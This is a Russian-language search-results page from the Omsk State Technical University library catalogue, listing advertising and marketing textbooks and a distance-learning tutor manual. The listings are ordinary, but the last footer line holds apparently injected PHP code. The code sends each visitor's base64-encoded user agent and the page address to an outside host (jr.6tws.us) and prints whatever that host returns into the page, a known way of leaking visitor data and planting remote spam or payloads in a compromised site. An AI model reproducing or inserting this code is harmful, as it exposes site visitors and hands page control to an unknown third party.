Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

47 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОЧТОВАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 66
1. 
Бобылева М. П. Рекламный менеджмент [Текст] : Основы проф. деятельности / М. П. Бобылева, 2004. - 240 с.
2. 
Назайкин, Александр Н. Медиапланирование на 100% [Текст] / А. Н. Назайкин, 2005. - 300 с.
Держатели документа (Информация об экземплярах) 
3. 
Преподавание в системе дистанционного обучения "Прометей" [Текст] : рекомендации по работе с интерфейсом тьютора / ОмГТУ, 2005. - 104 с.
Оглавление 
  • Условия применения. - с.5
  • Подготовка к работе. - с.6
  • Доступ к интерфейсу тьютора. - с.6
  • Структура интерфейса тьютора. - с.8
  • Информационная сводка. - с.11
  • Просмотр информации по курсам. - с.12
  • Работа с группами, подгруппами и отдельными слушателями. - с.13
  • Работа с группами. - с.13
  • Работа с подгруппами. - с.14
  • Работа со слушателями. - с.17
  • Работа с календарными планами. - с.20
  • Просмотр календарного плана группы. - с.20
  • Просмотр календарного плана слушателя. - с.21
  • Просмотр свойств мероприятий. - с.22
  • Создание, изменение и удаление мероприятий. - с.24
  • Работа с библиотекой. - с.27
  • Обращение к библиотеке. - с.27
  • Поиск в библиотеке. - с.28
  • Дизайнер тестов. - с.30
  • Создание тестов. - с.30
  • Создание секций. - с.31
  • Работа со списком секций. - с.33
  • Создание вопросов. - с.34
  • Работа со списком вопросов. - с.37
  • Создание ответов. - с.38
  • Работа со списком ответов. - с.50
  • Указание верных ответов. - с.51
  • Назначение весов ответов. - с.55
  • Удаление ответа, вопроса, секции, теста. - с.63
  • Блокировка тестов. - с.63
  • Выдача допусков к тестам. - с.64
  • Выдача допуска группе. - с.64
  • Выдача допуска слушателю. - с.65
  • Общение со слушателями. - с.67
  • Работа с объявлениями. - с.67
  • Почтовая рассылка. - с.70
  • Работа с файлами. - с.73
  • Форум. - с.80
  • Чат. - с.86
  • Книга отзывов. - с.90
  • Оценивание результатов обучения. - с.92
  • Выставление оценок. - с.92
  • Работа с отчетами о тестировании. - с.93
  • Работа с ведомостями. - с.97
  • Просмотр журнала посещений. - с.98
  • Просмотр и изменение персональных данных. - с.99
  • Завершение работы. - с.100
  • Термины и обозначения. - с.101
Держатели документа (Информация об экземплярах) 

Рекомендации составлены по соглашению с компанией "<Виртуальные технологии> в образовании" с использованием <технической документации> "СДО Прометей. Руководство тьютора".

Указания содержат описание объектов и команд пользовательского интерфейса тьютора, рекомендации по организации основных этапов преподавания в СДО "Прометей". Использование данных указаний поможет преподавателям, исполняющим функции тьюторов, успешно сопровождать учебный процесс в системе дистанционного обучения.

Печатается по решению редакционно-издательского совета ОМГТУ.

Полный текст
4. 
Визуальная культура: дизайн, реклама, полиграфия [Текст] : Материалы междунар. науч. конф. / ОмГТУ, 2003. - 127 с.
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
5. 
Ксардель, Доменик. Прямой маркетинг [Текст] / Д. Ксардель; Пер. с фр. под ред. С. Г. Божук, 2004. - 126, [1] с.
Держатели документа (Информация об экземплярах) 
6. 
Универсальная Десятичная Классификация [Текст] / ВИНИТИ, РАН ; гл. ред. Ю. М. Арский. Т. VII : Сельское хозяйство. Лесное хозяйство. Охота. Рыбное хозяйство. Домашнее хозяйство. Коммунально-бытовое хозяйство. Телекоммуникация. Полиграфическая промышленность. Транспорт. Почтовая связь. Бухгалтерия. Организация производства. Реклама, 2005. - 308 с.
Держатели документа (Информация об экземплярах) 
7. 
Панкратов, Федор Григорьевич. Основы рекламы [Текст] : учеб. для вузов по специальности "Реклама" / Ф. Г. Панкратов, Ю. К. Баженов, В. Г. Шахурин, 2006. - 524, [1] с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 

Это восьмое, переработанное и дополненное издание учебника по <рекламной> <деятельности>, ранее издававшегося под названием "Рекламная деятельность". В нем с учетом передового зарубежного и отечественного опыта освещаются социально-психологические основы <рекламы>; основные средства <маркетинговых> <коммуникаций> и их применение в рекламе; <правовое регулирование> рекламной деятельности в РФ; классификации рекламных средств, их характеристика, эффективность применения.

Специальные разделы посвящены организации и управлению рекламной деятельностью, основам разработки <рекламных текстов>, организации <паблик рилейшнз> на предприятии и некоторым другим вопросам.

Для студентов вузов, работников рекламно-информационных агентств и рекламных служб, предпринимателей, а также слушателей школ бизнеса.

8. 
Цензура и доступ к информации: история и современность [Текст] : тезисы докл. междунар. науч. конф., Санкт-Петербург, 16-18 март 2005 г. / Междунар. федерация библ. ассоц. и учреждений и др., 2005. - 126 с.
Держатели документа (Информация об экземплярах) 
9. 
Федотова, Лариса Николаевна. Реклама в коммуникационном процессе [Текст] : учеб. для вузов по специальности "Связи с общественностью" / Л. Н. Федотова, 2005. - 462, [1] с.
Держатели документа (Информация об экземплярах) 

Учебник "Реклама в коммуникационном процессе" анализирует рекламу как часть информационной среды современного общества. Этот феномен представлен в тексте как отражение социальных интересов включенных в эту деятельность групп, профессиональных слоев, населения. Такой подход отвечает месту дисциплины в учебном процессе по подготовке специалистов по связям с общественностью. Книга написана достаточно популярно, чтобы быть востребованной лицами, занятыми в сфере рекламного дела.

Предназначен для студентов, специализирующихся в области рекламы и паблик рилейшнз.

10. 
Бернадская, Юлия Сергеевна. Копирайтинг [Текст] : Учеб. пособие / Ю. С. Бернадская, 2003. - 136 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

В учебном пособии описываются основные теоретические аспекты копирайта: главные элементы <рекламного текста>, его лексико-синтактические характеристики, психологические приемы, используемые при составлении рекламных текстов.

Теоретический материал призван стать для дальнейшей практической работы специалистов по <рекламе>. Использование рассмотренных экстра- и интролингвистических приемов в рекламе, приемов в рекламных текстах повысит их коммуникативную эффективность, маркетинговую и художественную ценность.

Полный текст
11. 
Картер, Гарри. Эффективная реклама [Текст] : Путеводитель для мелких предприятий / Г. Картер; Пер. с англ. В. Б. Боброва; Общ. ред. Е. М. Пеньковой, 1991. - 279, [1] с.
Держатели документа (Информация об экземплярах) 
12. 
Практическое руководство по организации эффективной рекламной деятельности предприятия [Текст]. Т. 2, 1994. - 88 с.
Держатели документа (Информация об экземплярах) 
13. 
Саркисян О. А. Конспект рекламиста [Текст] / О. А. Саркисян, О. А. Груздева, Г. В. Красовский, 1999. - 133 с.
Держатели документа (Информация об экземплярах) 
14. 
Картер, Гарри. Эффективная реклама [Текст] : Путеводитель для малого бизнеса / Г. Картер; В. Б. Бобров, Е. М. Пенькова, 1998. - 244 с.
Держатели документа (Информация об экземплярах) 
15. 
16. 
Мокшанцев, Рудольф Иванович. Психология рекламы [Текст] : Учеб. пособие для вузов по специальности "Менеджмент" / Р. И. Мокшанцев, 2001. - 229 с.
Ключевые слова 
Реклама -- Учебник и пособие * -- Психология рекламы -- Психотехнология -- когнитивные аспекты рекламного воздействия -- эмоциональные аспекты рекламного воздействия -- поведенческий компонент рекламного воздействия -- психология творчества в рекламе -- психология мотивации в рекламе -- реклама в газете -- реклама в журнале -- реклама на радио -- реклама на телевидеии -- наружная реклама -- транзитная реклама -- реклама на транспорте -- психотехнологии рекламного текста -- рекламный текст -- прямая почтовая рассылка -- прямой контакт -- реклама по телефону -- реклама на месте продажи -- психология корпоративной символики -- суггестивные психотехнологии в рекламе -- психоанализ -- гипноз -- нейролингвистическое программирование -- психология отношения к рекламе -- психология света в рекламе -- психология цвета в рекламе -- психология формы в рекламе -- психотехнологии торговых ярмарок и выставок -- психотехнологии стендов -- экспонаты -- психология персонала стенда -- психология рекламы участия -- психология коммуникаций с посетителями -- психологическая эффективность рекламы -- фокус-группы -- парадоксальная реклама -- провальная реклама -- двусмысленная реклама
17. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 2001. - 351, [1] с.
18. 
Рекламная деятельность [Текст] : Учеб. для вузов / Ф. Г. Панкратов, Ю. К. Баженов, Т. К. Серегина, В. Г. Шахурин, 2002. - 361, [1] с.
Держатели документа (Информация об экземплярах) 
19. 
Картер, Гарри. Эффективная реклама [Текст] : Путеводитель для малого бизнеса: Пер. с англ. / Г. Картер; Под общ. ред. Е. М. Пеньковой, 2001. - 243, [1] с.
Держатели документа (Информация об экземплярах) 
20. 
Старобинский, Эдгар Евгеньевич. Самоучитель по рекламе [Текст] / Э. Е. Старобинский, 1999. - 352 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2933 - 21.06.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.97 с.12 запросов, 0.54c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;